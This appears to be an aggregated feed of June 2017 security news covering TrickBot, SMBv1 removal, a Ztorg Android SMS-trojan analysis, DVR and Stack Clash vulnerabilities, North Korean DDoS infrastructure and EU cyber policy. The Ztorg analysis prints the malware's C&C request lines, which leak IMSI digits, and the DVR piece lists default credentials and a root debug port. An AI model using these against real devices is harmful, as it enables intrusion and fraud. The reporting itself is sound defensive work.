The security firm first spotted the TrickBot malware in September while it was used by crooks to target the customers of Australian banks (ANZ, Westpac, St. George and NAB).

The first TrickBot samples analyzed by the experts were implementing a single data stealer module, but a few weeks later, the researchers discovered a new sample including webinjects that appear to be in the testing phase.

In September 2016, Fidelis Cybersecurity was alerted to a new malware bot calling itself TrickBot that we believe has a strong connection to the Dyre banking trojan. From first glance at the loader, called TrickLoader, there are some striking similarities between it and the loader that Dyre commonly used. It isn’t until you decode out the bot, however, that the similarities become staggering.” reads the analysis published by Fidelis Cybersecurity.

“This would suggest, but is far from conclusive, that some individuals related to the development of Dyre have found their way into resuming criminal operations.”

TrickBot and Dyre have many similarities, the code of the new banking trojan seems to have been rewritten with a different coding style, but maintaining many functionalities.

The malware was used in a number of attacks at the end of 2016 targeting banks in the UK and Australia, and Asian financial institutions.

In May, TrickBot was used to target 20 new private banking brands, eight building societies in the UK, two Swiss banks, private banking platforms in Germany, and four investment banking firms in the U.S.

Researchers at F5 analyzed 26 TrickBot configurations that were active in May 2017 when crooks also targeted two payment processing providers and two Customer Relationship Management (CRM) SaaS providers.

“In the 26 TrickBot configurations F5 researchers analyzed that were active in May 2017, targets expanded beyond banks to include two payment processing providers and two Customer Relationship Management (CRM) SaaS providers.” F5 reports. “The fact that payment processors were targets was a notable change that we also observed in Marcher, an Android banking trojan in March of 2017. It appears now that CRMs are a new target of attackers; is it because of their potential for collecting valuable user data that could enhance phishing campaigns?”

The F5 experts analyze two distinct TrickBot infection campaigns that were active in May, they respectively targeted 210 URL targets and 257 URLs. Both campaigns targeted the same US payment processor (PayPal), but according to F5 only the second campaign targeted the CRM providers.

Giving a look at the campaigns the experts discovered:

TrickBot gang

The first campaign:

Banks (83% of URL targets, 18% UK banks)
PayPal (a payment processor attributed to the US). 35 different PayPal URLs were also present in the configuration used in the second campaign.
Trickbot campaign 2

The second campaign:

Banks in UK (47% of targets).
Payment processors with the addition of a new payment processor URL in the UK.
CRMs Salesforce.com and an auto sales CRM developed by Reynolds & Reynolds in the US.
Trickbot campaign 2

F5 identified 6 C&C IP addresses belonging European web hosting provider networks, three of which are operated by hosting firms in Asia. All the IP addresses used 443 / HTTPS for communication with the infected hosts in order to avoid detection.

F5 concludes TrickBot gangs has extended their campaigns due to their success.

“It seems the success of TrickBot thus far has influenced the authors to not only repeat their previous target list of banks from previous campaigns but to expand those targets to include new banks globally as well as CRM providers. The fact that C&C servers in these two most recent campaigns reside within web hosting companies is also significant, along with the fact that the C&C servers were different from those used in previous campaigns,” F5 says.


Microsoft to Remove SMBv1 Protocol in Next Windows 10 Version (RedStone 3)
20.6.2017 thehackernews  Safety

The Server Message Block version 1 (SMBv1) — a 30-year-old file sharing protocol which came to light last month after the devastating WannaCry outbreak — will be removed from the upcoming Windows 10 (1709) Redstone 3 Update.
The SMBv1 is one of the internet's most ancient networking protocols that allows the operating systems and applications to read and write data to a system and a system to request services from a server.
The WannaCry ransomware, which wreaked havoc last month, was also leveraging an NSA's Windows SMB exploit, dubbed EternalBlue, leaked by the Shadow Brokers in its April data dump.
The WannaCry ransomware menace shut down hospitals, telecommunication providers, and many businesses worldwide, infecting hundreds of thousands of unpatched Windows servers running SMBv1 in more than 150 countries within just 72 hours on 12th of May.
Although Microsoft patched the vulnerability in SMBv1 in March in MS17-010, the company meanwhile strongly advised users to disable the three decades old protocol completely.
And you should disable it completely.
I mean come on, since Windows Vista you have SMBv2 and later SMBv3, and you are continuing to allow the old and horribly insecure SMBv1 protocol to run on your network.
Strange! Because there's no excuse to continue.
Ned Pyle, the principal program manager for Microsoft's Windows Server High Availability and Storage division, has also published a blog post this month, enlisting products from other vendors that are still using SMBv1 and begged them to stop using it now.
Pyle also hinted that the company has been planning to remove SMBv1 from Windows 10 Fall Creators Update (Version 1709), which is expected to release in September/October 2017.
"SMB1 is being removed (fully or partially, depending on SKU) by default in the RS3 release of Windows and Windows Server. This is coming, folks," Pyle wrote.
Microsoft has recently announced the beta release of Windows 10 "Creators Update," also known as "Redstone 2" (Version 1703), which disables the SMB1 protocol by default, and after testing and getting feedback from the community, the company has decided to completely remove the protocol in the next stable version of the operating system.
A Microsoft representative has just confirmed this to Threatpost, saying "We can confirm that SMBv1 is being removed for Redstone 3 [codename for the Windows 10 Fall Creators Update]."
Meanwhile, the company has published a document, which describes registry settings, PowerShell commands as well as group policy settings to disable SMBv1 in your Windows environment manually.


Ztorg: from rooting to SMS
20.6.2017 Kaspersky Android 

I’ve been monitoring Google Play Store for new Ztorg Trojans since September 2016, and have so far found several dozen new malicious apps. All of them were rooting malware that used exploits to gain root rights on the infected device.

Then, in the second half of May 2017 I found one that wasn’t. Distributed on Google Play through two malicious apps, it is related to the Ztorg Trojans, although not a rooting malware but a Trojan-SMS that can send Premium rate SMS and delete incoming SMS. The apps had been installed from Google Play more than 50,000 and 10,000 times respectively.

Kaspersky Lab products detect the two Trojan apps as Trojan-SMS.AndroidOS.Ztorg.a. We reported the malware to Google, and both apps have been deleted from the Google Play Store.

The first malicious app, called “Magic browser” was uploaded to Google Play on May 15, 2017 and was installed more than 50,000 times.

 

Trojan-SMS.AndroidOS.Ztorg.a on Google Play Store

The second app, called “Noise Detector”, with the same malicious functionality, was installed more than 10,000 times.

 

Trojan-SMS.AndroidOS.Ztorg.a on Google Play Store

What can they do?

After starting, the Trojan will wait for 10 minutes before connecting to its command and control (C&C) server. It uses an interesting technique to get commands from the C&C: it makes two GET requests to the C&C, and in both includes part of the International Mobile Subscriber Identity (IMSI). The first request will look like this:

GET c.phaishey.com/ft/x250_c.txt, where 250 – first three digits of the IMSI.

If the Trojan receives some data in return, it will make the second request. The second request will look like this:

GET c.phaishey.com/ft/x25001_0.txt, where 25001 – first five digits of the IMSI.

Why does the Trojan need these digits from the IMSI?

The interesting thing about the IMSI is that the first three digits are the MCC (mobile country code) and the third and fourth digits are the MNC (mobile network code). Using these digits, the cybercriminals can identify the country and mobile operator of the infected user. They need this to choose which premium rate SMS should be sent.

In answer to these requests, the Trojan may receive an encrypted JSON file with some data. This data should include a list of offers, and every offer carries a string field called ‘url’, which may or may not contain an actual url. The Trojan will try to open/view the field using its own class. If this value is indeed a url, the Trojan will show its content to the user. But if it is something else and carries an “SMS” substring, the user will send an SMS containing the text supplied to the number provided.

 

Malicious code where the Trojan decides if it should send an SMS.

This is an unusual way to send SMS. Just after it receives urls to visit, or SMS to send, the Trojan will turn off the device sound, and start to delete all incoming SMS.

I wasn’t able to get any commands for the Trojans distributed through Google Play. But for other Trojans located elsewhere that have the same functionality, I got the command:

{“icon”:”http://down.rbksbtmk.com/pic/four-dault-06.jpg”,”id”:”-1″,”name”:”Brower”,”result”:1,”status”:1,”url”:”http://global.621.co/trace?offer_id=111049&aff_id=100414&type=1″}

It was a regular advertising offer.

WAP billing subscriptions

I was able to find several more malicious apps with the same functionality distributed outside the Google Play Store. The interesting thing is that they don’t look like standalone Trojans, more like an additional module for some Trojan.

Further investigation revealed that these Trojans were installed by a regular Ztorg Trojan along with other Ztorg modules.

In a few of these Trojans, I found that they download a JS file from the malicious url using the MCC.

 

Malicious code where the Trojan downloads a JS file.

I downloaded several JS files, using different MCC’s, to find out what cybercriminals are going to do with users from a different countries. I wasn’t able to get a file for a US MCC, but for other countries that I tried I received files with some functions. All the files contain a function called “getAocPage” which most likely references AoC – Advice of Charge. After analyzing these files, I found out that their main purpose is to perform clickjacking attacks on web pages with WAP billing. In doing so, the Trojan can steal money from the user’s mobile account. WAP billing works in a similar way to Premium rate SMS, but usually in the form of subscriptions and not one-time payments as most Premium rate SMS.

 

JS file from a CnC for Russian users (MCC = 250)

It means that urls which the Trojan receives from the CnC may not only be advertising urls, but also urls with WAP billing subscriptions. Furthermore some Trojans with this functionality use CnC urls that contain “/subscribe/api/” which may reference subscriptions too.

All of these Trojans, including Trojans from Google Play, are trying to send SMS from any device. To do so they are using lots of methods to send SMS:

 

Part of the “Magic browser” app’s code

In total, the “Magic browser” app tries to send SMS from 11 different places in its code. Cybercriminals are doing this in order to be able to send SMS from different Android versions and devices. Furthermore, I was able to find another modification of the Trojan-SMS.AndroidOS.Ztorg that is trying to send an SMS via the “am” command, although this approach should not work.

 

Connection with the Ztorg malware family

The “Magic browser” app was promoted in a similar way to other Ztorg Trojans. Both the Magic browser” and “Noise detector” apps shared code similarities with other Ztorg Trojans. Furthermore, the latest version of the “Noise detector” app contains the encrypted file “girl.png” in the assets folder of the installation package. After decryption, this file become a Ztorg Trojan.

I found several more Trojans with the same functionality that were installed by a regular Ztorg Trojan along with the other Ztorg modules. And it isn’t the first case where additional Ztorg modules were distributed from Google Play as a standalone Trojan. In April 2017, I found that a malicious app called “Money Converter”, had been installed more than 10,000 times from Google Play. It uses Accessibility Services to install apps from Google Play. Therefore, the Trojan can silently install and run promoted apps without any interaction with the user, even on updated devices where it cannot gain root rights.

Trojan-SMS vs. rooting

There were two malicious apps on Google Play with the same functionality – “Noise Detector” and “Magic browser” but I think that they each had a different purpose. “Magic browser” was uploaded first and I assume that the cybercriminals were checking if they were able to upload this kind of functionality. After they uploaded the malicious app they didn’t update it with newer versions.

But it is a different story with “Noise Detector” – here it looks like the cybercriminals were trying to upload an app infected with a regular version of the Ztorg Trojan. But in the process of uploading they decided to add some malicious functionality to make money while they were working on publishing the rooting malware. And the history of “Noise Detector” updates prove it.

On May 20 they uploaded a clean app called “Noise Detector”. A few days later they updated it with another clean version.

Then, a few days after that, they uploaded a version to Google Play that contained an encrypted Ztorg Trojan, but without the possibility of decrypting and executing it. On the following day they finally updated their app with the Trojan-SMS functionality, but still didn’t add the possibility to execute the encrypted Ztorg module. It is likely that, if the app hadn’t been removed from Google Play, they would have added this functionality at the next stage. There is also the possibility that attempting to add this functionality is what alerted Google to the Trojan’s presence and resulted in its deletion.

Conclusions

We found a very unusual Trojan-SMS being distributed through Google Play. It not only uses around a dozen methods to send SMS, but also initializes these methods in an unusual way: by processing web-page loading errors using a command from the CnC. And it can open advertising urls. Furthermore, it is related to Ztorg malware with the same functionality, that is often installed by Ztorg as an additional module.

By analyzing these apps I found that cybercriminals are working on clickjacking WAP billing. It means that these Trojans may not only open ad urls, or send Premium rate SMS, but also open web-pages with WAP billing and steal money from a user’s account. To hide these activities the Trojans turn off the device sound and delete all incoming SMS.

This isn’t the first time that the cybercriminals distributed Ztorg modules through Google Play. For example, on April 2017 they uploaded a module that can click on Google Play Store app buttons to install or even buy promoted apps.

Most likely, the attackers are publishing Ztorg modules to make some additional money while they are trying to upload the regular rooting Ztorg Trojan. I suggest this because one of the malicious apps had an encrypted Ztorg module but it wasn’t able to decrypt it.

MD5

F1EC3B4AD740B422EC33246C51E4782F
E448EF7470D1155B19D3CAC2E013CA0F
55366B684CE62AB7954C74269868CD91
A44A9811DB4F7D39CAC0765A5E1621AC
1142C1D53E4FBCEFC5CCD7A6F5DC7177


TrickBot Targets Payment Processors, CRM Providers

20.6.2017 securityweek BotNet
Banking Trojan TrickBot is no longer hitting only banks and financial institutions, but also added payment processing and Customer Relationship Management (CRM) providers to its list of targets, F5 warns.

Supposedly developed by the same gang that previously operated the Dyre Trojan, TrickBot was first spotted in the summer of 2016, and initially detailed in October. By November, the malware was being used in widespread infection campaigns in the UK and Australia, and popped up in Asia the next month. Earlier this year, it started targeting the private banking sector.

The 26 active TrickBot configurations observed in May 2017 were targeting banks in the UK, Australia, US, Canada, New Zealand, Ireland, France, Germany, Switzerland, the Netherlands, Bulgaria, India, Singapore, and Hong Kong. All command and control (C&C) servers used as part of these campaigns were communicating with infected machines over port 443, F5 reports.

The list of Trojan’s targets now also includes two payment processing providers and two CRM SaaS providers, yet TrickBot isn’t the first to include them. In March this year, the Marcher Android banking Trojan started hitting payment processors too, the researchers say.

The F5 researchers analyzed two TrickBot infection campaigns that were active in May, with one configuration packing 210 URL targets and the other including 257 URLs. Both campaigns targeted the same US payment processor (PayPal), but the CRM targets only appeared in the second campaign.

The first campaign, F5 reveals, focused mainly on banks (83% of URL targets) and PayPal (a payment processor attributed to the US), but targeted no US bank. A total of 35 unique PayPal URLs found in the configuration used in this campaign were targeted in the second campaign too, although it mainly focused on banks in the UK (47% of targets).

The second campaign expanded the list of targeted banking URLs and payment processors with the addition of a new payment processor URL in the UK. CRMs were also added to the list, namely Salesforce.com and an auto sales CRM developed by Reynolds & Reynolds in the US.

F5 identified 6 C&C IP addresses, all within European web hosting provider networks, three of which are operated by hosting firms in Asia. All use 443 / HTTPS for communication with the infected hosts, which allows them to hide the malicious traffic and evade detection, because many anti-virus solutions don’t inspect encrypted traffic.

“It seems the success of TrickBot thus far has influenced the authors to not only repeat their previous target list of banks from previous campaigns but to expand those targets to include new banks globally as well as CRM providers. The fact that C&C servers in these two most recent campaigns reside within web hosting companies is also significant, along with the fact that the C&C servers were different from those used in previous campaigns,” F5 says.


Botnets Can Exploit More Vulnerabilities in DVRs

20.6.2017 securityweek Vulnerebility
Newly discovered vulnerabilities affecting DVR systems could open the door to new, more potent Internet of Things (IoT) botnets, Pen Test Partners security researchers warn.

Following months of investigation into the hardware and software security of more than 30 DVR brands, the researchers discovered a series of flaws that Mirai and other IoT botnets didn’t use, but which could have made these threats far more destructive. These include new telnet credentials and interfaces, as well as an exploitable buffer overflow over port 80 that impacts over 1 million devices.

The researchers also discovered new DVR brands that are vulnerable to Mirai, but which researchers didn’t know about before, and say that DVRs can be used to disable house alarms. They also note that Mirai could have used more default telnet credentials (qazxsw), along with new telnet interfaces that run on port other than 23.

The researchers found the non-standard telnet port 12323 that is used by some DVRs and which uses the same default credentials targeted by Mirai, along with an interface on TCP/9527, with credentials such as admin/blank or admin/123456, or similar, which led to a shell. Via directory traversal, an attacker could abuse the interface to recover the hashed passwords and crack them offline.

The source of the Mirai issue, the researchers suggest, is represented by the manner in which DVR vendors customized the products received from a single original design manufacturer (ODM) called XiongMai. Although vendors could change default credentials, they apparently had only a limited number of credentials to shuffle, and Mirai covers all of them.

However, botnets such as Mirai and Hajime aren’t the biggest threats to DVRs, the Pen Test Partners team argues. Because on some devices the web server running on port 80 is vulnerable to a buffer overflow via the GET request, code execution is possible, and remote access is possible. A botnet exploiting the issue could be larger than Mirai, the researchers say.

A debug interface running on port 9527 and which is present on most XM-based DVRs allows shell access as root with the credentials used for DVR login. Because the interface is port-forwarded by default, it’s likely discoverable on the public Internet in a home user & SME environment. It also packs a directory traversal vulnerability (CVE-2017-7577) and easily guessable default credentials.

The researchers also suggest that BrickerBot, a piece of IoT malware targeting the same devices as Mirai but completely disabling them, was actually meant to be a healing worm, but didn’t work as intended. The issue, they say, is that DVRs run a cut-down version of busybox, which lacks commands for the functionality BrickerBot wants to use. The malware, however, was set to brick the device if it couldn’t fix its vulnerabilities.

The Pen Test Partners researchers also say they found a way to remotely fix Mirai vulnerable devices. However, they decided against publishing the underlying details because the very same method can be used to make Mirai even more potent than it already is, by providing it with persistence over reboots.


'Stack Clash' Flaws Allow Privilege Escalation on Unix Systems

20.6.2017 securityweek Vulnerebility
Linux and other Unix-like operating systems are affected by a type of vulnerability that can be exploited by an attacker for root privilege escalation, Qualys warned on Monday.

The flaw, dubbed Stack Clash, is a memory management issue in Linux, OpenBSD, NetBSD, FreeBSD and Solaris on i386 and amd64 architectures. Affected Linux distributions include Red Hat, Debian, Ubuntu, SUSE, CentOS and Gentoo. Other operating systems and architectures could also be vulnerable.

The vulnerability is related to the memory region known as the stack, which grows automatically if an application requires more memory. The problem is that if the stack memory region grows too much, it can get too close to another region, which can result in the application confusing these regions.

This type of flaw, which attackers can exploit to overwrite the stack with another memory region by triggering a clash, has been known since 2005. After it was exploited again in 2010 (CVE-2010-2240), a protection called “stack guard page” was added to the Linux kernel to prevent stack overflow attacks. The stack guard page serves as a divider between a stack memory region and other regions.

However, researchers at Qualys discovered that the stack guard page protection can be bypassed and they developed several proof-of-concept (PoC) exploits to demonstrate it. The main Stack Clash vulnerability is tracked as CVE-2017-1000364, but there are several other flaws that are either directly related to it or independently exploitable.

The PoC code developed by Qualys shows how a local attacker can exploit the vulnerability to escalate privileges to root. However, the company believes remote attacks may also be possible against certain applications.

The PoC exploits will only be made public after users have had a chance to patch their systems. Technical details on Stack Clash have been made available by both Qualys and Grsecurity.

The developers of the affected operating systems have started releasing fixes and users have been advised to patch their installations. As a workaround, the hard RLIMIT_STACK and RLIMIT_AS resources of local users and remote services can be set to low values, but experts warned that it may be possible to bypass this mitigation.

Qualys recently reported finding a vulnerability that can be exploited by Sudo users on SELinux-enabled systems for root privilege escalation. The company pointed out that a combination of the Sudo flaw with the Stack Clash allows any local user (not just Sudo users) to escalate privileges on any affected Linux system (not just systems with SELinux enabled).


North Korea's DDoS Attacks Analyzed Based on IPs

20.6.2017 securityweek APT
Arbor Networks has used the IP addresses shared recently by United States authorities to analyze distributed denial-of-service (DDoS) attacks attributed to the North Korean government. The security firm believes the data may not be as useful for organizations as the U.S. hopes.

Earlier this month, the United States Computer Emergency Readiness Team (US-CERT) released a technical alert on behalf of the DHS and the FBI to warn organizations of North Korea’s Hidden Cobra activities, particularly its DDoS botnet infrastructure.

Hidden Cobra, a threat actor tracked by others as Lazarus Group, is believed to be behind several high-profile attacks, including the ones targeting Sony Pictures, Bangladesh’s central bank, and banks in Poland. Links have also been found between the group and the recent WannaCry ransomware attacks.

The US-CERT report focused on a DDoS tool dubbed DeltaCharlie. The organization has shared information on exploits, malware, IP addresses, file hashes, network signatures, and YARA rules associated with Hidden Cobra in an effort to help defenders detect the group’s attacks.

Data from Arbor Networks’ ATLAS infrastructure showed that 24 of the 632 IP addresses provided by US authorities were involved in at least one DDoS attack over a 105-day period between March 1 and June 13, 2017.

The company pointed out that its ATLAS infrastructure, which relies on data shared anonymously by nearly 400 globally distributed service providers, covers roughly one-third of Internet traffic, which means the actual number of IPs involved in attacks during this period is likely higher.

According to Arbor, 16 IPs participated in more than one of the 164 attacks observed by the company. The largest attack peaked at 4.3 Gbps, which is more than enough to disrupt unprotected systems, and the longest attack lasted for 44 hours.

While the largest concentration of IP addresses in the US-CERT report were in Russia, Arbor traced the highest percentage of IPs to Saudi Arabia (6 of 24) and the United Arab Emirates (5 of 24).

The IPs monitored by Arbor were involved in DDoS attacks on most days, but there were some periods with no activity. The longest period with no activity started on April 5, shortly after North Korea launched a missile into the Sea of Japan. While it’s unclear if the two events are in any way related, experts noted that DDoS attacks are often timed with significant geopolitical events.

Of the 164 DDoS attacks observed by researchers, nearly half were aimed at the United States, followed by the U.K., Australia, France, Saudi Arabia and Singapore.

SecurityWeek has reached out to several other DDoS protection companies, but none of them could immediately provide any information on the Hidden Cobra attacks.

Arbor said it conducted an analysis due to the fact that the US-CERT report, which the company has described as vague, was not clear on whether the IPs were bots or part of command and control (C&C) infrastructure, and it also failed to clarify if the IPs were “innocent” reflectors.

Arbor’s analysis – based on the types of attacks observed – suggests that the report lists open reflectors abused by DeltaCharlie and not the actual bots.

“This lack of context makes it difficult for responders to act. Security analysts would treat a list of command-and-control servers differently from a list of bots, and differently from a list of reflectors,” experts said. “Blindly loading such indicators into security systems could potentially cause more harm than good.”

This is not the first time the cybersecurity community has criticized a joint report from the FBI and the DHS. The report released late last year on GRIZZLY STEPPE activity, better known as Cozy Bear (APT29) and Fancy Bear (APT28 and Pawn Storm), failed to demonstrate that Russia was behind the U.S. election hacks.


Cloud Security Firm ShieldX Emerges From Stealth

20.6.2017 securityweek Security
ShieldX Networks Emerges From Stealth Mode With New Product to Protect Cloud Infrastructure

San Jose, CA-based cloud security start-up ShieldX Networks has today emerged from stealth with a new product, Apeiro. Apeiro takes microsegmentation as its baseline, and then layers additional security on top. In November 2015, the company completed a $9 million Series A financing round led by Bain Capital Ventures with participation from Aspect Ventures.

ShieldX delivers its security through microsegmentation that "provides full security controls, as well as visibility, automation and coordination across multiple cloud environments. As a result, a breach in one area of the network will not compromise other areas," claims the company.

ESG Labs has certified that Apeiro "supports VMware vSphere, OpenStack/KVM, and AWS environments, with additional cloud support on the horizon. Highly available and multi-tenant, Apeiro REST APIs support integration with DevOps-oriented processes." It also verifies that Apeiro "is fast and easy to deploy over an existing infrastructure (ShieldX boasts 15 minutes), and enables organizations to natively, automatically segment and secure cloud workloads at scale, across both physical and multi-cloud infrastructures."

But, claims ShieldX, microsegmentation alone is not enough. "Note that microsegmentation only restricts who can communicate to who and not what they say to each other," Dr. Ratinder Paul Singh Ahuja, CEO and founder of ShieldX told SecurityWeek. "This then creates the situation where a compromised system can still propagate malware because microsegmentation by itself doesn't inspect that level of detail in the communications between systems."

In a Friday blog post he gave an example. "The recent WannaCry malware propagated laterally within businesses using the Server Message Block (SMB) protocol. As a matter of policy, you are not going to use micro-segmentation to block the SMB port, or for example, the SQL port, in communications between applications and users in your network as those are used to carry legitimate traffic to conduct business. Yet these are common techniques used for exploits. So, if you now depend on microsegmentation alone to secure your data center or public cloud traffic, you could easily fall prey to WannaCry or the next generation of attack."

Apeiro provides deep packet inspection (DPI), visibility, policy management, and enforcement at cloud scale. Organizations can implement security policies on-demand, based on microsegmentation application-aware access control; threat detection from a combination of 10,000+ threat definitions; malware detection through integration with third-party products such as FireEye; TLS decryption/termination; and URL filtering. DLP is expected in a future release.

Although both the ShieldX announcement and the ESG Labs review specify 'FireEye', Ahuja told SecurityWeek that it is singled out only because many of ShieldX customers already use FireEye. "Apeiro can integrate with other advanced malware detection technologies as well as offer that capability from the ShieldX cloud if customers don't have such systems in place," he said.

The 10,000+ threat definitions, he added, "are sourced commercially as well as from our own research. These are dynamically updated and pushed out to Apeiro installations from the ShieldX cloud."

"We chose ShieldX as our cloud security partner," says Joe Jozen, VP of Tokyo Electron Device Limited (TED), "because our customers want to leverage the power and cost saving benefits of cloud innovation without compromising security. The Tokyo 2020 Olympics are a perfect example of how the partnership between TED and ShieldX will be critical to enabling the secure storage and transfer of information while protecting against cyber threats to provide a safe, enjoyable and connected experience for attendees."

In May 2017, ShieldX was featured in Gartner's 'Cool Vendors in Cloud Security, 2017'. "ShieldX is a pure-play security vendor with a cross-cloud microsegmentation product branded Apeiro that functions as network security middleware to support hosts and containers," writes Gartner. It "will appeal to I&O and security and risk management leaders in enterprises that have a virtualized infrastructure requiring segmentation, especially where those clouds are or will be heterogeneous, or if the enterprise is more a Mode 2 (i.e., DevOps) style and needs Mode 2 security for it."


Hackeři mohou špehovat lidi přes kamery. Kvůli chybám v ovládacím softwaru

20.6.2017 Novinky/Bezpečnost Hacking
Zneužít chyby v IP kamerách čínské výroby mohou relativně snadno počítačoví piráti. Touto cestou pak mohou špehovat bez vědomí uživatele lidi, kteří se budou nacházet před objektivem. Na chyby upozornila bezpečnostní společnost F-Secure.
Opticam i5 HD
Opticam i5 HD
FOTO: archív výrobce
Zranitelnosti umožňují útočníkovi ovládnout kameru, sledovat video a v některých případech i získat přístup k dalším zařízením nacházejícím se ve stejné síti,“ varoval Pavel Bašta, analytik Národního bezpečnostního týmu CSIRT.CZ.

Zranitelnosti byly objeveny prozatím ve dvou kamerách čínské společnosti Foscam. Konkrétně v modelech Foscam C2 a Opticam i5 HD.

Opticam i5 HD
Opticam i5 HD
Jak upozornili bezpečnostní výzkumníci společnosti F-Secure, postižených IP kamer bude daleko více, neboť totožný ovládací software používá více výrobců. „Je pravděpodobné, že se zranitelnosti budou nacházet i v dalších značkách, jako jsou Chacon, 7links, Netis, Turbox, Thomson, Novodio, Nexxt, Ambientcam, Technaxx, Qcam, Ivue, Ebode a Sab,“ doplnil Bašta.

Aktualizace zatím chybí
To představuje poměrně velké bezpečnostní riziko, neboť počítačoví piráti mohou kvůli chybám snadno získat nadvládu nad poměrně velkým množstvím kamer. Zda už byla chyba skutečně zneužita, však v tuto chvíli není jasné.

Samotní uživatelé se před objevenými trhlinami příliš chránit nemohou. Musí totiž počkat až do doby, kdy jednotliví výrobci vydají aktualizace ovládacích softwarů jednotlivých kamer. To ale může trvat klidně i několik týdnů.

Jedinou spolehlivou obranou je tak v tomto případě bohužel pouze odpojení kamer od počítačové sítě.


Za útoky na internetu hrozí sankce, varovala EU

19.6.2017 Novinky/Bezpečnost BigBrother
Země Evropské unie varovaly, že by na protiprávní činy v kybernetickém prostoru mohly společně reagovat například uvalením sankcí. Plyne to ze závěrů pondělního jednání ministrů zahraničí osmadvacítky v Lucemburku. Upozornění přichází v době, kdy se v USA i jinde mluví o snaze Ruska prosazovat své cíle právě prostřednictvím různých operací na internetu. V souvislosti s operacemi v kybernetickém prostoru ale bývá zmiňována také Čína nebo Severní Korea.
"EU je znepokojena čím dál větší schopností a odhodláním státních i nestátních aktérů sledovat své cíle prostřednictvím nepřátelských činností v kyberprostoru," uvedli ministři zahraničí osmadvacítky. Pokud by byl takový postup v rozporu s mezinárodním právem, vyhrazuje si podle nich unie možnost společného postupu.

Ministři také zdůraznili, že státy by neměly vědomě umožňovat, aby jejich území bylo využíváno pro páchání mezinárodně protiprávních činů za využití informačních a komunikačních technologií.

Mezinárodní spory v kybernetickém prostoru
Reakce EU na nepřátelské činnosti v kyberprostoru bude podle v pondělí přijatých závěrů schůzky využívat opatření společné zahraniční a bezpečnostní politiky, včetně opatření omezujících, tedy sankcí, pokud by byly nutné.

"Společná reakce EU na nepřátelské činnosti v kyberprostoru bude přiměřená rozsahu, míře, trvání, intenzitě, komplexnosti, propracovanosti a dopadu dané činnosti v kyberprostoru," uvedli ministři zahraničí EU.

Zdůraznili, že unie je odhodlána řešit mezinárodní spory v kybernetickém prostoru mírovými prostředky a snaží se o posilování spolupráce a snižování rizika nesprávného výkladu, eskalace a konfliktů, které mohou z incidentů v oblasti informačních a komunikačních technologií vyvstat.


Internet v roce 2021: 4,6 miliardy uživatelů a 3,1 milionů DDoS útoků

19.6.2017 SecurityWorld Analýzy
Do roku 2021 vzroste počet uživatelů internetu na 4,6 miliardy a připojeno bude přes 27 miliard zařízení – z toho více než 50 % budou tvořit zařízení internetu věcí. Stroje se tak vůbec poprvé stanou většinovým uživatelem internetu, nicméně prvenství v objemu dat i nadále zůstane lidem, kteří budou konzumovat celých 95 % internetového provozu. Množství přenesených dat se do roku 2021 globálně ztrojnásobí a dosáhne 3,3 zettabytů ročně, což je zhruba ekvivalent 825 miliard DVD nosičů. Dominantním obsahem bude video, které bude tvořit 80 % internetového provozu. Tyto závěry přinesla pravidelná studie Cisco Visual Networking Index. Ta dále předpovídá, že s narůstajícím objemem dat také poroste množství kybernetických útoků typu DDoS, které využívají infikovaná zařízení k zahlcení cíle velkým množstvím požadavků.
Studie Cisco Visual Networking Index (VNI) již 12 let pravidelně mapuje globální datový provoz. Aktuální studie se zaměřila na předpokládaný vývoj mezi lety 2016 a 2021 a předpovídá široké dopady, které bude mít na internet postupující digitální transformace. Právě ta bude hlavní příčinou strmě rostoucího počtu připojení pro komunikaci strojů (M2M).

Nejrychleji digitalizovaným odvětvím se podle odhadů Cisco stane zdravotnictví, což bude souviset s rozvojem zdravotních monitorů, dávkovačů léků a s připojením tzv. first responderů (nárůst o 30 % ročně). Druhou nejrychleji rostoucí oblastí se stane odvětví propojených vozidel a aplikací pro chytrá města (nárůst o 29 % ročně).

„Touto studií otevíráme okno do budoucnosti internetu. Skrz ně můžeme nahlédnout do světa, kde je každodenní realitou vzájemná komunikace mezi miliardami strojů a zařízení, ale kde drtivou většinu obsahu budou stále spotřebovávat lidé. Můžeme se těšit na boom zábavních vychytávek jako jsou rozšířená a virtuální realita, většina domácností si bude užívat možností 4K televizí. Více lidí si bude vybírat obsah na míru prostřednictvím internetového vysílání. S tím porostou jejich nároky na rychlost a kvalitu připojení, a technologické firmy i poskytovatelé služeb se na to musí připravit,“ říká Michal Stachník, generální ředitel Cisco ČR.

Již dnes tvoří video většinu internetového provozu, v roce 2016 představovalo 67 %. Trend růstu bude pokračovat a v roce 2021 dosáhne tento poměr 80 %. Na tento nárůst bude mít velký vliv rozvoj nových médií, která využívají přímého přenosu, například streamovací televize, streaming jednotlivých uživatelů či sociální sítě. Přímé přenosy vzrostou mezi lety 2016 a 2021 15krát a budou tvořit 13 % veškerého přenosu videa. Podobný boom zažije i virtuální a rozšířená realita. Provoz těchto technologií vzroste 20krát. Počet 4K televizí se zvýší z 85 milionů v roce 2016 na 663 milionů v roce 2021. Zatímco dnes tvoří 15 % připojených televizorů, v roce 2021 už budou mít 56% většinu.

V roce 2016 se internetem každý měsíc přeneslo 96 exabytů dat. Podle studie Cisco VNI naroste do roku 2021 téměř trojnásobně na 278 exabytů. Ročně tedy bude činit IP provoz zhruba 3,3 zettabytů. Pro představu, jeden exabyte odpovídá zhruba velikosti HD videa v délce 36 000 let či 250 000 000 DVD nosičů. V roce 2021 tedy internetem projde objem dat srovnatelný s HD videem v délce skoro 120 milionů let (to je například dvakrát delší doba než před kterou žil Tyrannosaurus Rex). Celý datový provoz internetu by se tak vešel zhruba na 825 miliard DVD nosičů.

Již v roce 2016 generovala mobilní či jiná bezdrátová zařízení většinu internetového provozu (62 %). Jejich poměr poroste i nadále a v roce 2021 se jejich podíl zvýší na 73 %. S tím souvisí i prudký nárůst Wi-Fi hotspotů. Zatímco v roce 2016 jich bylo na světě v provozu asi 85 milionů, v roce 2021 jejich počet stoupne na 526,2 milionů. Zeměmi s největším počtem hotspotů budou v roce 2021: Čína (170 milionů), USA (86 milionů), Japonsko (33 milionů) a Francie (30 milionů).

